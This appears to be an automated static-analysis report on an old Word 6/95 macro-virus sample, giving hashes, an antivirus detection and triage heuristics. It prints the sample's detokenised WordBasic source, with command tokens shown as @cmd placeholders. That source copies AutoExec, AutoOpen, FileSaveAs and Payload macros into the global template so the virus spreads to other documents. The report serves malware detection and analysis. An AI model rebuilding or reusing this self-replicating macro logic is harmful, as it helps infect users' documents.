Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cc3b21c983ddb1a…

MALICIOUS

Office (OLE)

7.5 KB First seen: 2012-06-14
MD5: 98c9fdad8502113d5adbaa8a398c5142 SHA-1: 238d3728fd6119dc5597e93bec870faf888bc9e5 SHA-256: 8cc3b21c983ddb1a3acaebd3947ad1d20040946507979f16c0f052f2ade54695
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers, specifically 'RSN MACRO VIRUS', and contains numerous embedded macro names and code snippets. The presence of these markers and the structure of the document strongly suggest an attempt to execute malicious macros, a common technique for older malware families. The ClamAV detection as 'Win.Trojan.Nuclear-7' further supports a malicious classification.

Heuristics 3

  • ClamAV: Win.Trojan.Nuclear-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Nuclear-7
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 1625 bytes
SHA-256: aab2017839db6b91be3a18eafe0cd4837cd94e9d35dcf8033be25b277ac39168
Preview script
First 1,000 lines of the extracted script
, = , 21349          
        357 24943
= 24943
=
MAIN
REM 	StartDir$ = "C:\"
REM 	ChDir StartDir$
REM 	ScanDir StartDir$
ScanDir Path$
@cmd80ac Path$
DirCount = @cmd80e8
n = 1 DirCount
DirName$ = @cmd80e9 n
temp$ = @cmd80a1 "*.*"
temp$
@cmd8103 temp$ , 0
@cmd80ab temp$
temp$ = @cmd80a1
ScanDir DirName$ n
@cmd80a1 "." Path$
@cmd80ac ".."
MAIN
CheckInstalled = 0
@cmd80c2 @cmd803b = ":AutoExec" , "Global:AutoExec" , 1
@cmd80c2 @cmd803b = ":AutoOpen" , "Global:AutoOpen" , 1
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSaveAs" , 1
@cmd80c2 @cmd803b = ":InsertPayload" , "Global:InsertPayload" , 1
@cmd80c2 @cmd803b = ":PayLoad" , "Global:Payload" , 1
Payload
CheckInstalled
CheckInstalled = 0
@cmd80b7 0 0
i = 1 @cmd80b7 0
= @cmd80b8 i , 0 = "AutoExec"
CheckInstalled = 1
=
i
MAIN
CheckInstalled = 0
@cmd80c2 @cmd803b = ":AutoExec" , "Global:AutoExec" , 1
@cmd80c2 @cmd803b = ":AutoOpen" , "Global:AutoOpen" , 1
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSaveAs" , 1
@cmd80c2 @cmd803b = ":InsertPayload" , "Global:InsertPayload" , 1
@cmd80c2 @cmd803b = ":PayLoad" , "Global:Payload" , 1
Payload
CheckInstalled
REM Check if AutoExec macro already exists.
CheckInstalled = 0
@cmd80b7 0 0
i = 1 @cmd80b7 0
= @cmd80b8 i , 0 = "AutoExec"
CheckInstalled = 1
=
i
MAIN
dlg @cmd0054
dlg
dlg
dlg = 0 dlg = 1
@cmd80c2 "Global:AutoExec" , @cmd803b = ":AutoExec" , 1
@cmd80c2 "Global:AutoOpen" , @cmd803b = ":AutoOpen" , 1
@cmd80c2 "Global:FileSaveAs" , @cmd803b = ":FileSaveAs" , 1
@cmd80c2 "Global:InsertPayload" , @cmd803b = ":InsertPayload" , 1
@cmd80c2 "Global:Payload" , @cmd803b = ":Payload" , 1
dlg = 1
@cmd0054 dlg
MAIN